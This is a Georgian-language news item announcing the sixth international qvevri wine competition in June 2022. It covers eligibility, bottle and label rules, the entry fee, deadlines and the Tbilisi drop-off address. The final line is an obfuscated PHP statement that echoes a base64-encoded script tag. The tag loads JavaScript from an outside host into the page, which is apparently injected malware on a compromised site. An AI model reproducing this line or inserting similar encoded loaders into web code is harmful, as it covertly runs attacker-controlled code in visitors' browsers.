celsiusi
ავერსი შნაიდერი
ასოციაცია „ქართული ღვინო“- ს, გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს და ღვინის ეროვნული სააგენტოს ორგანიზებით, 2022 წლის ივნისში, საქართველოში ქვევრის ღვინის საერთაშორისო კონკურსი უკვე მეექვსედ ჩატარდება. ინფორმაციას ამის შესახებ ღვინის ეროვნული სააგენტო ავრცელებს. 
 
მათივე ცნობით, კონკურსის მიზანია მსოფლიოსთვის საუკეთესო ქვევრის ღვინოების წარდგენა (როგორც ქართული ასევე უცხოური); ქვევრის ღვინის წარმოების და მოხმარების ხელის შეწყობა და სხვადასხვა ქვეყანაში წარმოებული ქვევრის ღვინის ცნობადობის ამაღლება.
 
კონკურსში მონაწილეობა შეუძლიათ ქვევრის ღვინის მწარმოებლებს, მსოფლიოს ნებისმიერი ქვეყნიდან და რეგიონიდან. ასევე, კონკურსში მონაწილე შეიძლება იყოს: ღვინის საწარმო, ინდივიდუალური მეღვინე, კოოპერატივი ან მეღვინეთა გაერთიანება. კონკურსში მონაწილე კომპანიამ თუ კერძო პირმა ნიმუშები შემდეგი სახით უნდა წარადგინოს.
 
ღვინის ეროვნული სააგენტოს ინფორმაციით, ღვინის წარდგენის აუცილებელი წინაპირობებია: 
 
"ღვინო ქვევრში უნდა იყოს დაყენებული, ქვევრში ღვინის დაყენების ტექნოლოგიის წესების დაცვით; ღვინო უნდა იყოს გასაყიდად ბოთლში ჩამოსხმული; წარდგენილი ღვინის მინიმალური ნაშთი 400 ბოთლზე ნაკლები არ უნდა იყოს; ბოთლის ეტიკეტი უნდა მოიცავდეს შემდეგ ინფორმაციას: მწარმოებელი კომპანიის სრული დასახელება, ღვინის დასახელება, ჩამოსხმის წელი, ყურძნის ჯიში/ჯიშები, რეგიონი/ქვეყანა, მოცულობა. 
 
ამასთან აუცილებელია, რომ წარდგენილი თითოეული ნიმუში აკმაყოფილებდეს შემდეგ პირობებს:
წარდგენილი უნდა იყოს ერთი დასახელების ღვინის 3 ნიმუში ( ბოთლი= 0.75ლ);
ბოთლს უნდა ჰქონდეს კომერციული ეტიკეტი;
სარეგისტრაციო ფორმაში შეტანილი ინფორმაცია უნდა ემთხვეოდეს ეტიკეტზე დატანილ ინფორმაციას (მოსავლის წელი, დასახელება და ა.შ), შეუსაბამობის შემთხვევაში ნიმუში მოიხსნება კონკურსიდან;
ნიმუშები მოთავსებული უნდა იყოს ყუთში და ყუთს ზემოდან უნდა ეწეროს კომპანიის დასახელება;
 
კომპანიას მაქსიმუმ შეუძლია წარადგინოს 10 სახეობის ღვინის ნიმუში, 10–ზე მეტი არ დაიშვება.
ნიმუშების მოტანამდე საჭიროა რეგისტრაცია გაიაროთ ასოციაცია “ქართული ღვინო”-ს ოფიციალურ ვებ-გვერდზე www.gwa.ge, 2022 წლის 20 მაისამდე.
 
ნიმუშების მიღების მოხდება 16-20 მაისის ჩათვლით,  13:00 -დან 17:00 საათამდე, შემდეგ მისამართზე: ასოციაცია „ ქართული ღვინოს“ ოფისი– მთაწმინდის ქ. 12, 0108, თბილისი. 
 
საკონკურსო ნიმუშების გამოგზავნის ბოლო ვადა არის 2022 წლის 20 მაისი. ნიმუშები, რომლებიც არ შეესაბამება საკონკურსო წესებს, უკან არ გაიგზავნება. ნიმუშის საფასური და გადახდის მეთოდი:ნიმუშის წარდგენის საფასური შეადგენს 70 ლარს დღგ-ს ჩათვლით. 
 
გადარიცხვების და სხვა დეტალებისთვის შეგიძლიათ სრული ინფორმაცია მიიღოთ მითითებულ ბმულზე https://gwa.ge/qgsk_/2022/
 
საპრიზო კატეგორიების შესაბამისი სტიკერების დამზადება მოხდება მხოლოდ ასოციაცია „ქართულ ღვინო“-სთან შეთანხმებით.
 
ქვევრის ღვინო – ღვინო, რომელიც დადუღებული და დავარგებულია არანაკლებ მისი დაწურვის წლის 31 დეკემბრამდე, სრულ ან ნაწილობრივ ჭაჭაზე." ნათქვქმია ინფორმაციაში. 
 
 
805
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");